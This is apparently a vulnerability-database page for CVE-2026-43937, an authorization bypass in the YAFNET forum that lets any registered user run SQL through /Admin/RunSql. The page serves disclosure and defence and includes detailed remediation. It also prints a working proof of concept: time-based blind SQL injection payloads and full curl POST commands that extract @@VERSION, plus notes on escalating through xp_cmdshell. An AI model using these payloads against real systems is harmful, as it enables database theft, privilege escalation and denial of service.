Skip to main content

YAFNET CVE-2026-43937

HIGH
SQL Injection (CWE-89)
2026-05-05 https://github.com/YAFNET/YAFNET GHSA-xhw7-j96h-c3g5
8.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.8 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

2
Source Code Evidence Fetched
May 05, 2026 - 21:31 vuln.today
Analysis Generated
May 05, 2026 - 21:31 vuln.today

DescriptionGitHub Advisory

Issue Details: YAFNET's only admin authorization gate is PageSecurityCheckAttribute, implemented as a ResultFilterAttribute that runs *after* the page handler completes rather than before it. No other gate exists. Any admin OnPost… handler therefore executes its side effects before the filter rewrites the response to a 302 to /Info/4. The most impactful abuse is /Admin/RunSql, whose OnPostRunQuery binds Editor from the POST body and passes it straight to IDbAccess.RunSql with no caller check, yielding arbitrary SQL execution for any low-privileged user.

A deterministic boolean-conditional time oracle was confirmed end-to-end by extracting the first character of @@VERSION: IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 77) WAITFOR DELAY '0:0:5' produced a ~5-second delay (confirming the byte is M), while IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 76) WAITFOR DELAY '0:0:5' returned immediately.

Impact: An attacker holding the lowest-privileged authenticated role, effectively an anonymous attacker on any deployment that permits self-registration, gains arbitrary blind SQL execution against the application's database, with full INSERT/UPDATE/DELETE access to every table including the Identity store (AspNetUsers, yaf_User, yaf_UserRole). This yields full loss of Confidentiality (any column extractable via the time oracle), full loss of Integrity (blind writes to identity, posts, and forum configuration, including self-promotion to HostAdmin), and full loss of Availability (DELETE/DROP/WAITFOR-driven DoS). The impact escalates out of the application's trust domain: if the underlying SQL Server instance has xp_cmdshell or CLR integration enabled (common in development and test builds), the same primitive yields OS-level command execution on the database host. Because the bypass is class-wide, every other admin handler is also callable, multiplying the blast radius across user management, XML imports, and file-writing configuration pages.

Likelihood: Exploitation requires only a registered forum account (self-registration available on most deployments) and a single HTTP POST request. The attack is fully automatable in one request per probe and produces a deterministic time-based oracle with no error handling required, making the overall likelihood very high.

Steps to Reproduce:

  • Register or log in to the forum as any low-privileged user.
  • Acquire the standard __RequestVerificationToken token from any rendered page and the cookies.
  • Use the following CURL command:

Payload: `IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 77) WAITFOR DELAY '0:0:5'` (77 is the character M) URL Encoded Payload: `%49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%37%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27`

curl.exe --path-as-is -i -s -k -X POST `
  -H 'Host: yetanotherforum.internal:8080' `
  -H 'User-Agent: curl/8.18.0' `
  -H 'Accept: */*' `
  -H 'Content-Type: application/x-www-form-urlencoded' `
  -H 'Content-Length: 428' `
  -H 'Connection: keep-alive' `
  -b '<Replace with Cookies>' `
  --data-binary 'Editor=%49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%37%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27&__RequestVerificationToken=<Replace with Token>' `
  -w '\n----\nDNS:        %{time_namelookup}s\nConnect:    %{time_connect}s\nTTFB:       %{time_starttransfer}s\nTotal time: %{time_total}s\nHTTP code:  %{http_code}\n' `
  'http://yetanotherforum.internal:8080/Admin/RunSql?handler=RunQuery'

<img width="1619" height="921" alt="image" src="https://github.com/user-attachments/assets/1c5d4d96-a69a-47eb-9558-e5fe1e6cc9e4" />

Payload: `IF (ASCII(SUBSTRING(@@VERSION, 1, 1)) = 76) WAITFOR DELAY '0:0:5'` (76 is the character L) URL Encoded Payload: `%49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%36%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27`

curl.exe --path-as-is -i -s -k -X POST `
  -H 'Host: yetanotherforum.internal:8080' `
  -H 'User-Agent: curl/8.18.0' `
  -H 'Accept: */*' `
  -H 'Content-Type: application/x-www-form-urlencoded' `
  -H 'Content-Length: 428' `
  -H 'Connection: keep-alive' `
  -b '<Replace with Cookies>' `
  --data-binary 'Editor=%49%46%20%28%41%53%43%49%49%28%53%55%42%53%54%52%49%4e%47%28%40%40%56%45%52%53%49%4f%4e%2c%20%31%2c%20%31%29%29%20%3d%20%37%36%29%20%57%41%49%54%46%4f%52%20%44%45%4c%41%59%20%27%30%3a%30%3a%35%27&__RequestVerificationToken=<Replace with Token>' `
  -w '\n----\nDNS:        %{time_namelookup}s\nConnect:    %{time_connect}s\nTTFB:       %{time_starttransfer}s\nTotal time: %{time_total}s\nHTTP code:  %{http_code}\n' `
  'http://yetanotherforum.internal:8080/Admin/RunSql?handler=RunQuery'

<img width="1616" height="928" alt="image" src="https://github.com/user-attachments/assets/e499da2e-d4d1-41cd-a5da-e709bf60f817" />

Observe that when the condition is true the response time increases, if false, it remains unchanged which confirms the presence of SQL Injection.

Remediation:

  • Convert PageSecurityCheckAttribute from a ResultFilterAttribute to an IAsyncPageFilter so the admin check runs in OnPageHandlerExecutionAsync and short-circuits with AccessDenied() before any handler side effects occur.
  • Layer an ASP.NET Core authorization policy as defense-in-depth: AddAuthorization(... AddPolicy("YafAdmin", ...)) combined with AuthorizeFolder("/Admin", "YafAdmin") in the Razor Pages conventions.
  • Restrict /Admin/RunSql to HostAdmin only and wrap IDbAccess.RunSql in a statement-type allow-list that rejects non-read-only SQL, even for legitimate admins.
  • Audit and fix any other authorization logic implemented in ResultFilterAttribute / OnResultExecuting(Async), they share the same lifecycle bug.
  • Add regression tests that invoke each admin OnPost… handler as a non-admin and assert no database or filesystem side effects occur.

AnalysisAI

Authorization bypass in YAFNET forum software (versions ≤4.0.4) allows any low-privileged authenticated user to execute arbitrary SQL commands against the backend database. The flaw stems from a misplaced ASP.NET Core filter (PageSecurityCheckAttribute) that validates admin privileges *after* page handlers execute, enabling attackers to inject SQL via the /Admin/RunSql endpoint before the 302 redirect occurs. Publicly available exploit code exists (GitHub advisory GHSA-xhw7-j96h-c3g5) demonstrating time-based blind SQL injection to extract @@VERSION and manipulate identity tables. CVSS 8.8 (AV:N/AC:L/PR:L) reflects network-accessible exploitation requiring only a standard forum account-trivially obtained via self-registration on most deployments. Vendor-released patch available in version 4.0.5.

Technical ContextAI

YAFNET is an ASP.NET Core-based open-source forum platform (NuGet package yafnet.core) built on Razor Pages with SQL Server backend. The vulnerability exploits a fundamental ASP.NET Core filter lifecycle misunderstanding: ResultFilterAttribute executes in the result-processing pipeline *after* OnPost* handlers complete, meaning PageSecurityCheckAttribute only modifies the HTTP response (302 redirect) while the handler's database side effects (SQL execution, file writes, user role changes) have already occurred. The affected /Admin/RunSql handler binds unsanitized POST data directly to IDbAccess.RunSql with no parameterization, yielding CWE-89 (SQL Injection). The time-based oracle uses SQL Server's WAITFOR DELAY and conditional IF statements to exfiltrate data byte-by-byte. Because the bypass affects the entire PageSecurityCheckAttribute class, all admin endpoints (/Admin/*) are vulnerable to unauthorized invocation, though /Admin/RunSql provides the most direct SQL primitive. The fix refactors authorization into OnPageHandlerExecutionAsync (an IAsyncPageFilter hook) that short-circuits execution *before* handlers run.

RemediationAI

Upgrade immediately to YAFNET 4.0.5 or later (vendor-released patch confirmed by GitHub commit 27f7e671f93698f7e014d5d0fb88320248b8aa20). The patch migrates authorization logic from ResultFilterAttribute to OnPageHandlerExecutionAsync in ForumPage.cs, ensuring admin checks execute before handler side effects. No workaround exists that fully mitigates the vulnerability while remaining on ≤4.0.4. Interim compensating controls (each with significant trade-offs): (1) Disable self-registration and manually vet all user accounts-reduces attacker surface but breaks open-forum deployments and requires ongoing operational overhead. (2) Use a web application firewall (WAF) to block POST requests to /Admin/* paths from non-admin session tokens-brittle (requires deep session inspection) and bypassable if attacker compromises a legitimate admin session cookie. (3) Restrict SQL Server permissions for the YAFNET application's database user to read-only on identity tables (AspNetUsers, yaf_User, yaf_UserRole) and revoke ALTER, DROP, and EXECUTE on stored procedures-limits privilege escalation but does not prevent data exfiltration or DoS via WAITFOR. (4) Disable xp_cmdshell and CLR integration on the SQL Server instance-prevents OS-level breakout but does not address the core authorization bypass. None of these controls prevent the time-based SQL injection primitive. Organizations unable to upgrade within 24-48 hours should consider taking the forum offline. Post-upgrade, audit admin activity logs for anomalous /Admin/RunSql requests from non-admin users prior to patching. Advisory URLs: https://github.com/YAFNET/YAFNET/security/advisories/GHSA-xhw7-j96h-c3g5 (vendor), https://github.com/advisories/GHSA-xhw7-j96h-c3g5 (GitHub aggregated advisory).

Share

CVE-2026-43937 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy